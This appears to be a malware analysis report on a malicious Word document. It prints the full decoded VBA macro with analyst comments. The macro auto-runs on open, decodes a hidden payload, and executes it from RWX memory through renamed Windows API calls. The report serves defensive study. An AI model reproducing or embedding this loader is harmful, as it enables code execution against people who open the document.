Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 270bae0c287fb5bb…

MALICIOUS

Office (OLE)

175.0 KB · Created: 2016-11-28 13:42:00 · Authoring application: Microsoft Office Word · First seen: 2019-02-26
MD5: b317cedaca3d7072982e3284eb16e5d6 SHA-1: 3f7ca3ee35a834815e3d7ab6da5bac5358f3726e SHA-256: 270bae0c287fb5bb1d5e49bb1cfaf0ccca636606c1b68780ea7740a2a7e78813
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File · T1059 Command and Scripting Interpreter

The sample contains a VBA macro that is triggered by the Document_Open event. The macro references the WriteProcessMemory API, suggesting it attempts to inject code into another process. While the script is heavily obfuscated, its structure and API usage indicate it likely downloads and executes a second-stage payload. No specific family could be identified.

Heuristics (4)

  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim omnibus As Byte
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The URLs listed below are XMP/RDF namespace identifiers of the kind found in embedded image metadata; none of them appears in the extracted macro source.
    URL http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14441 bytes
SHA-256: 92441d9b342e9e71ca0ce608fde4855d9b346e4c2378457914f1b0408fc1dfd0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module "ThisDocument" (the document class module). It holds the Document_Open
' auto-exec handler and the stage-1 routines chalybeate / carcinoid / nightline.
' Two further routines in this module (footer, max) are never called by that chain.
Sub chalybeate()
' Stage 1 of the macro chain (called from Document_Open).
' Pulls an encoded payload string out of the form module "nauclea", decodes it
' with disaccord.fa, copies the bytes into executable memory via carcinoid, and
' finally starts a thread at an offset inside that memory via SHCreateThread.
' The many string assignments and the "While x >= y" loops with x < y are
' padding: they never run or have no observable effect.
Dim pipsqueak As Integer
Dim caressd As Integer
' "nauclea" is the last module in this listing; "ravigote" is presumably a
' control on it exposing a Tabs collection (the control itself is not shown).
Set exhilarate = nauclea.ravigote.Tabs
For Each albuterol In exhilarate
aglitter = 6
' Dead loop: 6 >= 9 is false, the body never executes.
While aglitter >= 9
aglitter = aglitter + 2
skewed = Disconnect
skewed = skewed
Wend

' The tab whose Index is 9 carries the encoded payload in its Name.
If albuterol.Index = 9 Then
cavort = "pinioned"
cranberry = "ultimogeniture"
mayhaw = "panache"
defluat = albuterol.Name
End If
Next
' 80 - 92 + 7472 = 7460: the length of the encoded text. disaccord.fa reads
' exactly 7460 characters, so only the trailing 7460 chars of the Name are used.
tragulidae = 80 - 92 + 7472
blacktop = Right(defluat, tragulidae)
' acroclinium receives the decoded bytes (returned as a String) from the decoder.
acroclinium = disaccord.fa(blacktop)
' Padding loop: string assignments with no observable effect.
For candelilla = 50 To 66
cellulosid = 66
Disconnect = "unanalyzable"
liberals = "an" & LTrim("natt") & "o"
liberals = RTrim("ar") & "chaistic"
Next candelilla

cagoule = "chitty"
' Bitness-dependent declarations. heartstirring is the Type entremet from
' module disaccord; only its single field is zeroed here and it is otherwise
' unused. roodscreen / outdo hold the allocation base and the thread start address.
#If Win64 Then
Dim dynamism As Integer
Dim heartstirring As entremet
Dim roodscreen As LongPtr
Dim outdo As LongPtr
heartstirring.start = 104 - 104
Dim micromyx As Long
#Else
Dim files As Integer
Dim outdo As Long
heartstirring = 0
Dim trekker As Variant
Dim roodscreen As Long
#End If
atherinidae = 0
megacolon = LCase$("aD") & "elge" & "s"
ezochin = 4096
jeremiade = 75
medicolegal = 88
' 75 / 88 is non-zero, so the If branch is taken; both branches are padding.
If (jeremiade / medicolegal) Then
jeremiade = RTrim("be") & Replace("lfascamped", "scamped", "st")
skewed = "planetal"
absurdum = absurdum + 85
catachrestic = Replace("amonosyllabically", "monosyllabically", "cc") & LCase$("redItAtioN")
Else
accelerating = Int(133.88)
medicolegal = 90
End If

gliming = "catechize"
golden = "broadheaded"
enthrone = "no" & RTrim("thingness")
asunder = 73
illegal = 56
' Same pattern as above: non-zero quotient, padding in both branches.
If (asunder / illegal) Then
asunder = LTrim("po") & Trim("rgy")
absurdum = Abs(197.454)
skewed = "alveolate"
adversely = LCase$("hA") & LTrim("zard") & Trim("ous")
Else
absurdum = Round(137.147)
illegal = 76
End If

' carcinoid allocates RWX memory in this process, copies the decoded payload
' into it and returns the base address of the region.
restaurateur = acroclinium
parsimoniousness = Trim("co") & LCase$("RPUL") & Replace("encgrudging", "grudging", "e")
duplicable = Replace("pworkings", "workings", "r") & "elimi" & RTrim("nary")
roodscreen = carcinoid(restaurateur)
brutify = Replace("pericales", "ericales", "a") & LCase$("PilLoN")
recklessly = "acetous"
' Entry-point offset into the copied payload:
'   33 + 109 - 22 + 1160 = 1280 in the first branch,
'   (121 + 393) + 3204  = 3718 in the Win32 branch.
' Which branch is compiled depends on the host's VBA6 / Win64 / Win32 constants.
#If VBA6 And Win64 Then
Dim detonize As String
pultaceous = "shaky"
canopy = Trim("bar") & "trami" & "a"
vespid = "tabard"
antemundane = 33 + 109 - 22 + 1160
#ElseIf Win32 Then
unbent = "mattole"
amphiprostylar = "conscious"
cotidal = 121 + 393
antemundane = cotidal + 3204

#End If
Dim concretion As Variant
Dim install As Variant
Dim kazak As Long
' 85 - 104 + 74 - 55 = 0
kazak = 85 - 104 + 74 - 55
' Thread start address = allocation base + offset.
outdo = roodscreen + antemundane
Dim mimmitation As Long
' 92 - 91 = 1
mimmitation = 92 - 91
' novice is SHCreateThread (see module disaccord):
'   SHCreateThread(pfnThreadProc = outdo, pData = 0, flags = 1, pfnCallback = 0)
' i.e. execution of the copied payload starts here on a new thread.
' (flags = 1 is CTF_INSIST in the SDK headers, if memory serves — confirm.)
chutney = novice(outdo, kazak, mimmitation, kazak)
labourite = 6
' Dead loop: 6 >= 9 is false.
While labourite >= 9
labourite = labourite + 2
impolicy = "arteriovenous"
accelerating = accelerating / 290
Wend

End Sub

Function carcinoid(cannery)
' Stage 2: allocates an executable region in the current process and copies
' the decoded payload (cannery, a Variant holding the String returned by fa)
' into it. Returns the base address of the region (0 if allocation failed,
' since arch is never checked).
Dim unsmooth As String
Dim bluing As Integer
Dim toed As String
Dim bestowment As String
' gentilism = pointer size: 8 on Win64, 4 otherwise.
#If Win64 Then
Dim flannelette As String
Dim absoluteness As LongPtr
gentilism = 8
Dim depopulate As Variant
Dim arch As LongPtr
Dim toke As Long
Dim coprolalia As LongPtr
Dim macaw As String
#Else
Dim holocephali As Long
Dim absoluteness As Long
gentilism = 4
Dim arch As Long
Dim sinanthropus As Integer
Dim coprolalia As Long
Dim freak As Long
Dim unction As String
#End If
' First WriteProcessMemory (via nightline): copies one pointer-sized value from
' VarPtr(cannery) + 8 into the local absoluteness. Offset 8 of a VARIANT is its
' data union, so absoluteness presumably ends up holding the address of the
' payload string's characters — TODO confirm in a debugger.
accomplishable = nightline(VarPtr(absoluteness), VarPtr(cannery) + 8, gentilism)
' 63 + 44 + 78 - 186 = -1: the current-process pseudo-handle. The "injection"
' therefore targets the Word process itself, not another process.
pneumatology = 63 + 44 + 78 - 186
' BaseAddress (in/out): 0 lets the kernel pick the address.
arch = 0
' ZeroBits
bathymetry = 0
' RegionSize: 34 + 9346 = 9380 bytes
coprolalia = 34 + 9346
' AllocationType 4096 = 0x1000 = MEM_COMMIT
ionian = 4096
' Protect 64 = 0x40 = PAGE_EXECUTE_READWRITE
desolation = 64
' counterpunch is ZwAllocateVirtualMemory (see module disaccord):
'   ZwAllocateVirtualMemory(-1, &arch, 0, &9380, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
' The NTSTATUS result (irreproducibility) is never inspected.
irreproducibility = counterpunch(ByVal pneumatology, arch, ByVal bathymetry, coprolalia, ByVal ionian, ByVal desolation)
Disconnect = "suscitate"

accelerating = Int(450.19)

' Second WriteProcessMemory: copies 15 + 5579 = 5594 bytes from the payload
' data (absoluteness) into the new RWX region (arch).
nightline arch, absoluteness, 15 + 5579
caryophyllaceae = 10
' Dead loop: 10 >= 13 is false.
While caryophyllaceae >= 13
caryophyllaceae = caryophyllaceae + 2
accelerating = Round(360.1458)
absurdum = absurdum \ 127
Wend

carcinoid = arch
End Function
Function nightline(allignment, cordial, bachelorship)
' Thin wrapper around WriteProcessMemory (imported as "apt" in module disaccord):
' copies bachelorship bytes from address cordial to address allignment using
' process handle -1 (the calling process). Nothing is assigned to nightline,
' so the function's return value is always Empty; the API result is discarded.
#If Win64 Then
Dim hallucinogenic As Variant
Dim prickings As LongPtr
Dim valletta As LongPtr
Dim comet As LongPtr
Dim bale As Long
Dim sida As LongPtr
Dim autopilot As LongPtr
#Else
Dim valletta As Long
Dim maleficence As Variant
Dim prickings As Long
Dim griping As Integer
Dim sida As Long
Dim assizes As Variant
Dim comet As Long
Dim selfrestraint As Long
Dim autopilot As Long
Dim vehis As Integer
Dim arrectis As String
#End If
' Destination address.
valletta = allignment
' Source address.
sida = cordial
' Padding loop.
For despitefully = 42 To 64
venezuela = 64
absurdum = Abs(321.1216)
debugger = "ana" & "tropous"
debugger = RTrim("ac") & LCase$("QUireR")
Next despitefully

' hProcess = -1 (current process).
prickings = -1
fistular = "cl" & Trim("inically")
Borders = LCase$("AG") & Trim("io")
' Byte count.
autopilot = bachelorship
daybed = "lee"
crate = Trim("sk") & LTrim("itte") & Trim("r")
' WriteProcessMemory(-1, valletta, sida, autopilot, comet). Every parameter of
' apt is declared "ByVal ... As Any", so comet (still 0) presumably goes in as a
' NULL lpNumberOfBytesWritten — confirm.
apt ByVal prickings, valletta, sida, autopilot, comet
calved = 64
mincing = 73
' Non-zero quotient: the If branch runs; both branches are padding.
If (calved / mincing) Then
calved = RTrim("act") & "inomyc" & Replace("otbench", "bench", "ic")
skewed = impolicy
absurdum = Int(139.729)
apologetics = "ca" & Replace("pigallium", "gallium", "to") & LTrim("l")
Else
accelerating = Int(375.1486)
mincing = 96
End If

End Function
Private Sub Document_Open()
' Auto-exec entry point: Word runs this when the document is opened (this is
' the trigger behind the OLE_VBA_DOCOPEN heuristic). The only statement with
' an effect is the call to chalybeate; everything else is padding.
Dim omnibus As Byte
Dim socinianism As Variant
detestation = "assertive"
chalybeate
glechoma = 10
' Dead loop: 10 >= 13 is false.
While glechoma >= 13
glechoma = glechoma + 2
impolicy = "governmental"
Disconnect = Disconnect
Wend
End Sub
Sub footer()
' Not referenced anywhere in the visible call chain. It reads like a Word
' object-model sample (adds an even-page header to every section of the
' active document) and presumably serves as filler to make the module look
' legitimate.
    Dim cSection As Section
    With ActiveDocument
        For Each cSection In .Sections
            cHeader = cSection.Headers(wdHeaderFooterEvenPages)
            If Not cSection.Headers(wdHeaderFooterEvenPages).Exists Then
                cSection.PageSetup.OddAndEvenPagesHeaderFooter = True
                cSection.Headers(wdHeaderFooterEvenPages).Range.Text _
                    = "Section " & cSection.Index & " of " & .FullName
                cSection.Headers(wdHeaderFooterEvenPages).Range. _
                    Style = "Even Footer"
            End If
        Next cSection
    End With
End Sub



Attribute VB_Name = "disaccord"
' Module "disaccord": Win32 API imports hidden behind renamed aliases, plus the
' decoder fa() and its helper functions further down.
' Of the imports below, only three are called by the visible code:
'   apt          -> WriteProcessMemory      (called from nightline)
'   counterpunch -> ZwAllocateVirtualMemory (called from carcinoid)
'   novice       -> SHCreateThread          (called from chalybeate)
' The remaining imports (OpenMutexA, AttachConsole, GetCPInfoExA,
' ChangeTimerQueueTimer, FindFirstFileA) are never referenced in this listing.
' The lyric-like comments interleaved below are part of the original sample.
'In so much space
#If Win64 Then
'You really think you're in control
' entremet is only used as a dummy local in chalybeate (Win64 branch).
Public Type entremet
'Well, I think you're crazy
start As LongPtr
'Just like me
End Type
'And I hope that you are having the time of your life
Public Declare PtrSafe Function centralized Lib "kernel32.dll" Alias "OpenMutexA" (acromatic As LongPtr,wisconsinite As LongPtr,asperula As LongPtr) As LongPtr
'Ever since I was little, ever since I was little it looked like fun
Public Declare PtrSafe Function interpreter Lib "kernel32.dll" Alias "AttachConsole" (hartstongue As LongPtr)
'And it's no coincidence I've come
Public Declare PtrSafe Function basel Lib "kernel32.dll" Alias "GetCPInfoExA" (scoter As LongPtr, testudinidae As LongPtr,concious As LongPtr) As Boolean
'Probably
' WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten),
' all parameters declared ByVal As Any.
Public  Declare PtrSafe Function apt Lib "Kernel32" Alias "WriteProcessMemory" (ByVal blackhead As Any, ByVal glowing As Any, ByVal microbial As Any, ByVal dibucaine As Any, ByVal schoolchild As Any) As LongPtr
'Maybe you're crazy
Public Declare PtrSafe Function presuppose Lib "kernel32.dll" Alias "ChangeTimerQueueTimer" (ByVal contortionist As LongPtr, ByVal bronchiolitis As LongPtr,deformational As LongPtr, ByVal labstenir As LongPtr) As LongPtr
'Come on now, who do you, who do you, who do you, who do you think you are,
' SHCreateThread(pfnThreadProc, pData, flags, pfnCallback) from shlwapi.
Public  Declare PtrSafe Function novice Lib "Shlwapi" Alias "SHCreateThread" (ByVal perishing As LongPtr, ByVal aphaeretic As Any, ByVal cobalt As Any, ByVal exceptions As Any) As LongPtr
'And it's no coincidence I've come
' ZwAllocateVirtualMemory(ProcessHandle, *BaseAddress, ZeroBits, *RegionSize,
' AllocationType, Protect). Note the fourth parameter's "ByVal" is fused into
' its name (moresByVal), so it is passed ByRef — which is what RegionSize
' needs anyway. The caller overrides the other ByRef parameters with ByVal at
' the call site.
Public  Declare PtrSafe Function counterpunch Lib "ntdll" Alias "ZwAllocateVirtualMemory" (garran As LongPtr, tippet As LongPtr, ByVal monilia As LongPtr,moresByVal As LongPtr, cimetidine As LongPtr, ByVal centrosomic As LongPtr) As LongPtr
'Maybe you're crazy
Public Declare PtrSafe Function atheromatous Lib "kernel32.dll" Alias "FindFirstFileA" (coyol As LongPtr,christsthorn As LongPtr) As Boolean
'In so much space

'And all I remember is thinking, I want to be like them
#Else
' 32-bit variants of the same imports; apt, counterpunch and novice keep the
' same alias names so the callers compile unchanged on either bitness.
'Even your emotions had an echo
Public Declare Function airflow Lib "kernel32.dll" Alias "OpenMutexA" (figurative As Long, varicella As Long, bailiffship As Long) As Long
'Even your emotions had an echo
Public Declare Function forsaking Lib "kernel32.dll" Alias "GetCPInfoExA" (cledge As Long, ontogeny As Long, convenance As Long) As Boolean
'And all I remember is thinking, I want to be like them
Public Declare Function jealous Lib "kernel32.dll" Alias "ChangeTimerQueueTimer" (ByVal balourdise As Long, ByVal eventual As Long, cremation As Long, ByVal unpassionate As Long) As Long
'You really think you're in control
' Same fused "ByVal" in the fourth parameter name (panopticonByVal) as above.
Public Declare Function counterpunch Lib "ntdll" Alias "ZwAllocateVirtualMemory" (okay As Long, nolle As Long, ByVal puncheon As Long, panopticonByVal As Long, earned As Long, ByVal assegai As Long) As Long
'But think twice, that's my only advice
Public Declare Function teemless Lib "kernel32.dll" Alias "FindFirstFileA" (braced As Long, swahili As Long) As Boolean
'Without care,
Public Declare Function novice Lib "Shlwapi" Alias "SHCreateThread" (ByVal cracker As Long, ByVal betise As Any, ByVal nelumbonaceae As Any, ByVal depraved As Any) As Long
'Yeah, I was out of touch
Public Declare Function devils Lib "kernel32.dll" Alias "AttachConsole" (devoured As Long)
'Ha ha ha bless your soul
Public Declare Function apt Lib "Kernel32" Alias "WriteProcessMemory" (ByVal mulet As Any, ByVal likin As Any, ByVal disavowable As Any, ByVal mammalia As Any, ByVal accompanist As Any) As Long
'And I can die when I'm done

'Ha ha ha bless your soul
#End If
'I just knew too much
Sub max()
' Not referenced by the visible call chain. Looks like a Word object-model
' sample (maximises the first window of a document named "Example.doc"); it
' would fail at run time unless such a document is open, so it is presumably
' filler rather than functional code.
    With Documents("Example.doc").Windows(1)
        If .WindowState = wdWindowStateMinimize Then _
            .WindowState = wdWindowStateMaximize
    End With
End Sub

Function darmera(underdog, crankiness)
' Bitwise And, wrapped in a function so the decoder's byte-masking in fa()
' does not read as an obvious bit operation.
darmera = underdog And crankiness
End Function
Function bumcombe(blut, wickedness)
' Multiplication; fa() uses it with powers of two to build its shift tables.
bumcombe = blut * wickedness
End Function
Function orthodontist(assafoetida, barye)
' Integer division; fa() uses it with 65536 / 256 to extract bytes.
orthodontist = assafoetida \ barye
End Function
Function fa(clubfoot) As String
' Base64 decoder over a shifted alphabet.
' 1. Reads the first 7460 characters of clubfoot into a byte array.
' 2. Adds 9 to every character code (so the encoded text uses an alphabet
'    that sits 9 positions below standard base64).
' 3. Decodes 4 characters -> 3 bytes with a standard base64 table
'    (A-Z = 0..25, a-z = 26..51, 0-9 = 52..61, '+' = 62, '/' = 63).
' The 5595 decoded bytes land at the start of the 6966-byte array dismet,
' which is returned as a String (VBA's Byte-array-to-String assignment).
' darmera / bumcombe / orthodontist are And / * / \ wrapped as functions.
' No '=' padding handling and no error handling; a character code above 255
' or an input shorter than 7460 characters raises a run-time error.
Disconnect = "antimuon"

Dim brisance As Variant

Dim outscourings As Long
' Decode table: character code -> 6-bit value.
Dim irrationality(255) As Byte
Dim gowned() As Byte
' Shift tables: value << 12, value << 18, value << 6 (filled below).
Dim grassroots(63) As Long
Dim selfincrimination(63) As Long
Dim solitary As String
accelerating = absurdum And 255

' Output buffer.
Dim dismet(6965) As Byte
Dim caluminiator(63) As Long
Dim advoutry As Integer
Dim ungarnished As Integer

' tuition = write index into dismet; constituent = loop / scratch variable.
Dim tuition As Long
Dim constituent As Long
Dim anglican As String

Dim dankness As Long
' Arithmetic-obfuscated constants (evaluated values on the right):
counterplot = 47 - 98 + 114
' 4032 (unused)
appeach = 38 - 58 - 57 + 4109
' 2^18
blossomed = 262144
' 46 - 34 - 16 + 4100 = 4096 = 2^12
deft = 46 - 34 - 16 + 4100
' 2^16
augustinian = 65536
' 0xFF
amoto = 255
' 2^6
discerning = 64
' 2^8
cleansing = 256
' 16515072 = 0xFC0000 (unused)
design = 47 + 16515025
' 16711680 = 0xFF0000
incircumspect = 94 + 16711586
' 0xFF00
bilimbi = 65280
' 258048 = 0x3F000 (unused)
proline = 96 + 17 + 15 + 257920
Dim moratorium As Integer

Dim frappe As Byte

Dim geophilidae As Byte

Dim apart As String
' Input buffer: 7460 character codes.
Dim bergamot(7459) As Byte
' 0
virginibus = 74 - 74
' 109 + 37 + 7313 = 7459
dawplucker = 109 + 37 + 7313
' Step 1: bergamot(i) = AscW(Mid$(clubfoot, i + 1, 1)) for i = 0..7459.
For abused = virginibus To dawplucker
fissurella = 1
roberts = Mid$(clubfoot, abused + 1, fissurella)
automatically = Trim("non") & RTrim("prescr") & "iption"
disenchanted = LCase$("ca") & "daveric"
indigo = "entomophthorales"
hyperemic = neverending(roberts)
bergamot(abused) = hyperemic
Next
Dim craniotomy As Variant
' Padding loop.
For cornmeal = 15 To 61
nucleoplasm = 61
impolicy = "bally"
revolving = RTrim("yel") & LTrim("loweyed")
revolving = LCase$("fo") & Replace("rfeatherlike", "featherlike", "eru") & RTrim("n")
Next cornmeal

barmaid = 7459
edirne = 35
' Step 2: shift every character code by +9 (Byte overflow above 246 would error).
For slatternly = 0 To barmaid
bergamot(slatternly) = bergamot(slatternly) + 9
Next slatternly
deontology = 7
' Dead loop: 7 >= 12 is false.
While deontology >= 12
deontology = deontology + 2
accelerating = Round(486.1246)
absurdum = accelerating \ 267
Wend

advoutry = 0
kamarupan = 80 - 75 - 114 + 231
' 24 - 48 + 279 = 255: last table index.
nekton = 24 - 48 + 279
cover = 0
' 73 - 111 + 81 = 43 = '+'
tadarida = 73 - 111 + 81
' Build the standard base64 decode table.
For constituent = cover To nekton
If (constituent >= 65 And constituent <= 90) Then irrationality(constituent) = constituent - 65
If (constituent >= 97 And constituent <= 122) Then irrationality(constituent) = constituent - 71
If (constituent >= 48 And constituent <= 57) Then irrationality(constituent) = constituent + 4
If constituent = tadarida Then irrationality(constituent) = 62
If constituent = 47 Then irrationality(constituent) = 63
Next constituent
' Shift tables: caluminiator = i * 64, grassroots = i * 4096, selfincrimination = i * 262144.
For constituent = 0 To 63
caluminiator(constituent) = bumcombe(constituent, discerning)
grassroots(constituent) = bumcombe(constituent, deft)
selfincrimination(constituent) = bumcombe(constituent, blossomed)
Next constituent
dearest = 2
' Dead loop: 2 >= 5 is false.
While dearest >= 5
dearest = dearest + 2
Disconnect = "coveted"
skewed = impolicy
Wend

' Work on a copy of the shifted input.
gowned = bergamot
genetics = 4
maharashtra = 10
' Dead loop: 10 >= 14 is false.
While maharashtra >= 14
maharashtra = maharashtra + 2
skewed = impolicy
absurdum = accelerating * 1
Wend

cloakroom = 3
absurdum = accelerating * 1

impolicy = "anorectic"

intuition = cloakroom + 1
mannikin = 2
' Step 3: main decode loop. dankness advances by 4 per iteration (the +3
' inside the body plus the Next increment), so each pass consumes one
' 4-character group gowned(dankness .. dankness + 3) and emits 3 bytes.
For dankness = 0 To barmaid
copious = gowned(dankness)
untouchable = gowned(dankness + 2)
' outscourings = (t[c0] << 18) + (t[c1] << 12) + (t[c2] << 6) + t[c3]
outscourings = selfincrimination(irrationality(copious)) _
 + grassroots(irrationality(gowned(dankness + 1))) + caluminiator(irrationality(untouchable)) + irrationality(gowned(dankness + cloakroom))
' byte 0 = (v And 0xFF0000) \ 65536
constituent = darmera(outscourings, incircumspect)
dismet(tuition) = orthodontist(constituent, augustinian)
' byte 1 = (v And 0xFF00) \ 256
constituent = darmera(outscourings, bilimbi)
dismet(tuition + 1) = orthodontist(constituent, cleansing)
' byte 2 = v And 0xFF
dismet(tuition + mannikin) = darmera(outscourings, amoto)
tuition = tuition + mannikin + 1
dankness = dankness + 3
Next
fa = dismet
End Function

Function neverending(drake)
' Returns the Unicode code of the first character of drake (AscW); fa() uses
' it to turn each input character into a table index.
neverending = AscW(drake)
End Function


Attribute VB_Name = "nauclea"
Attribute VB_Base = "0{784E3901-4B59-4F0D-A9AB-990B835A665B}{E921563C-F5BD-434C-9FC4-15D58AABC259}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Module "nauclea": the VB_Base GUID pair suggests a UserForm. chalybeate reads
' nauclea.ravigote.Tabs and takes the Name of the tab with Index 9 as the
' encoded payload, so the payload lives in this form's control data, which is
' not part of the decoded VBA source shown here.